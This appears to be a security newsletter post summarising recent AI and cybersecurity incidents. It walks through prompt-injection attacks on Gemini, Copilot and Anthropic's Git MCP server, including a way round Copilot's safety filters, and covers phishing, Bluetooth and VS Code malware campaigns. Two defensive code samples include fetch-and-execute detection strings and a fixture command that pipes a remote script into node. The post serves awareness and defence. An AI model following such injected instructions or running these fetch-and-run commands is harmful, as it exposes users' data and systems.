Hi, I'm Vivian, a cybersecurity and AI Product Manager trying to keep up with an industry that moves faster than I can whisk up my morning matcha. Every week brings a new wave of vulnerabilities, AI security mishaps, and breaches that keep us on our toes, so I take some time to share the most interesting news instead of letting it all blur together. Let's dive into what kept us up at night recently in cybersecurity and AI security.

AI Research & Vulnerabilities:

Remote Code Execution in Anthropic's Git MCP Server

Three critical vulnerabilities were discovered in Anthropic's official Git Model Context Protocol server that enable remote code execution through prompt injection. The flaws stem from insufficient path validation and argument injection in tools like git_init and git_diff, allowing attackers to manipulate AI assistants into reading sensitive files, deleting data, or executing arbitrary commands when chained with standard filesystem capabilities. Version 2025.12.18 patches these vulnerabilities.
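The two defect classes named above (a path that escapes the directory a tool is allowed to touch, and a user-controlled argument that git parses as an option) are what an input layer in front of git has to stop. The following is an added example of such checks and is not the Git MCP server's code; the sandbox root and function names are assumptions.

```python
"""Defensive input checks for an AI-tool wrapper around git (added example).

Two controls: repository paths must resolve inside ALLOWED_ROOT, and
positional arguments may never look like git options. The resulting argv
is meant for subprocess.run(..., shell=False). Names here are illustrative.
"""
from pathlib import Path

ALLOWED_ROOT = Path("/srv/repos").resolve()  # assumed sandbox root for all repos


def safe_repo_path(user_path: str) -> Path:
    """Resolve user_path (including '..' and absolute forms) and require it
    to stay at or under ALLOWED_ROOT; otherwise refuse."""
    candidate = (ALLOWED_ROOT / user_path).resolve()
    if candidate != ALLOWED_ROOT and ALLOWED_ROOT not in candidate.parents:
        raise ValueError(f"path escapes allowed root: {user_path!r}")
    return candidate


def safe_git_args(args: list[str]) -> list[str]:
    """Reject anything git would parse as an option and pin the remaining
    values as positionals after '--' so they can only ever be paths."""
    for a in args:
        if a.startswith("-"):
            raise ValueError(f"option-like argument rejected: {a!r}")
        if "\x00" in a or "\n" in a:
            raise ValueError(f"control character in argument: {a!r}")
    return ["--", *args]


def build_git_diff(repo: str, paths: list[str]) -> list[str]:
    """argv for a constrained 'git diff' limited to the sandboxed repo."""
    repo_dir = safe_repo_path(repo)
    return ["git", "-C", str(repo_dir), "diff", *safe_git_args(paths)]


def rejected(check, *args) -> bool:
    """True if the given check refuses its input (used for demonstration)."""
    try:
        check(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(build_git_diff("proj", ["README.md"]))
    print(rejected(safe_repo_path, "../../etc/passwd"))   # True
    print(rejected(safe_git_args, ["--output=/tmp/out"]))  # True
```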

Google Gemini Vulnerability Exploited via Calendar Invites

Researchers disclosed a vulnerability in Google Gemini that allowed data exfiltration through malicious Google Calendar invitations. The attack worked as an indirect prompt injection where instructions were embedded in calendar invite descriptions. When users asked Gemini about their schedule, the AI would process the poisoned entry and execute hidden commands to summarize private meeting details and copy them into new events visible to the attacker. The exploit bypassed standard security controls by manipulating the model's contextual understanding without requiring link clicks or new permissions.

Single-Click Data Theft Vulnerability in Microsoft Copilot

A critical vulnerability called Reprompt was found in Microsoft Copilot Personal that enabled data exfiltration via a single malicious link. The attack exploited a prompt injection flaw in the URL parameter, forcing the AI to execute hidden instructions immediately upon loading. Using a double-request technique to bypass safety filters, the exploit could silently extract file access history, location data, and conversation logs without further user interaction, persisting even after the browser tab was closed. Microsoft has patched the issue, and enterprise versions were not affected.

AI News:

OpenAI Implements Behavioral Age Prediction for Teen Safety

OpenAI rolled out an age prediction model for ChatGPT consumer plans that analyzes behavioral signals like usage patterns, activity times, and account longevity to estimate whether users are under 18. The system automatically applies stricter safety protocols for potential minors, including filtering graphic violence, sexual roleplay, and content promoting unhealthy beauty standards. Users incorrectly flagged can restore full access through identity verification. The initiative aims to prevent age falsification during signup.

OpenAI Launches Standalone Translation Tool

OpenAI quietly released a web-based translation service for instant text conversion. The tool allows users to adjust translation tone with presets like business formal or simplified for children, and lets them move into a full AI conversation for complex follow-up queries. It currently lacks multimedia features like image or document translation but is available free to all users, and it represents a shift toward consumer-facing utility products.

Google Gemini "Personal Intelligence" Accesses Private Data

Google launched Personal Intelligence for its Gemini app, allowing the AI assistant to access and cross-reference data from Gmail, Google Photos, YouTube, and Search history for personalized responses. This enables complex tasks like finding a vehicle's license plate from a photo while retrieving its maintenance history from emails, or planning vacations based on past travel preferences. It competes directly with other memory-enabled AI assistants by leveraging Google's user data ecosystem.

Cybersecurity News:

LinkedIn Phishing Campaign Uses Comment Replies

Scammers are exploiting LinkedIn with fraudulent comment replies that impersonate platform support using fake company pages and official branding. These automated comments claim user accounts have been restricted for policy violations and urge victims to visit external links, sometimes masked by LinkedIn's own lnkd.in shortener. The links redirect to credential harvesting sites that exploit user trust in platform notifications and official URL structures.

"WhisperPair" Vulnerabilities Expose Bluetooth Headphones

A set of vulnerabilities collectively called WhisperPair was discovered in the Google Fast Pair implementation used by popular Bluetooth audio accessories. The flaws let attackers within radio range bypass pairing authentication and force connections without user interaction. This unauthorized access enables audio stream hijacking to eavesdrop via microphones, inject malicious commands, or track victim locations using the Google Find My Device network if the accessory hasn't been previously paired with an Android device.

Malicious Chrome Extensions Target Enterprise HR and ERP Systems

Five malicious Chrome extensions were identified that hijack user sessions on enterprise platforms like Workday, NetSuite, and SuccessFactors. Disguised as productivity tools or administrative safeguards, the extensions exfiltrate authentication cookies to remote servers, block access to security settings, and inject stolen tokens for account takeover. The malware specifically targets and blocks incident response capabilities like password changes and audit log access, locking administrators out of their own security controls.

North Korean Hackers Weaponize Visual Studio Code

An evolution in the Contagious Interview campaign attributed to North Korean threat actors now abuses the task configuration feature in Visual Studio Code to execute malicious code. Attackers trick developers into downloading malicious repositories under the pretense of job interviews or technical assignments. Once the repository is trusted in VS Code, the tasks.json file automatically executes a background command that fetches and runs a JavaScript payload, planting a backdoor for remote access without alerting the user.
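The mechanism described above relies on a VS Code task whose runOptions.runOn is set to "folderOpen", which runs automatically once the folder is trusted. Below is an added defender-side example, not code from the campaign or from the VS Code project, that scans a tasks.json for such tasks and notes fetch-and-execute patterns in their command lines; the heuristics and the sample file are constructed for this example.

```python
"""Scan a repository's .vscode/tasks.json for tasks that auto-run on folder open.

Added example: flags tasks with runOptions.runOn == "folderOpen" and records
hints that the command pulls remote content or pipes it into an interpreter.
The hint list and the sample fixture are constructed, not taken from the
reported campaign.
"""
import json

# Substrings suggesting a task fetches remote content or pipes it to an interpreter.
FETCH_EXEC_HINTS = ("curl", "wget", "invoke-webrequest", "iwr ", "node -e",
                    "| sh", "| bash", "| node", "powershell -e")


def load_tasks_json(text: str) -> dict:
    """Parse tasks.json, tolerating the whole-line // comments VS Code allows."""
    cleaned = "\n".join(l for l in text.splitlines() if not l.strip().startswith("//"))
    return json.loads(cleaned)


def command_line(task: dict) -> str:
    """Flatten a task's command and args (string or {"value": ...} forms)."""
    def value(x):
        return str(x.get("value", "")) if isinstance(x, dict) else str(x)
    return " ".join([value(task.get("command", ""))] + [value(a) for a in task.get("args", [])])


def find_auto_run_tasks(text: str) -> list[dict]:
    """Return one finding per task configured to run when the folder opens."""
    findings = []
    for task in load_tasks_json(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        line = command_line(task)
        hints = [h for h in FETCH_EXEC_HINTS if h in line.lower()]
        findings.append({"label": task.get("label", "<unlabelled>"),
                         "command": line, "fetch_exec_hints": hints})
    return findings


# Constructed fixture: one ordinary build task and one auto-run fetch-and-pipe task.
SAMPLE_TASKS_JSON = """{
  // constructed test fixture, not a real repository
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell",
     "command": "curl -s https://example.invalid/s.js | node",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}"""

if __name__ == "__main__":
    for finding in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(finding)
```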

That's all for now… Stay informed and protected.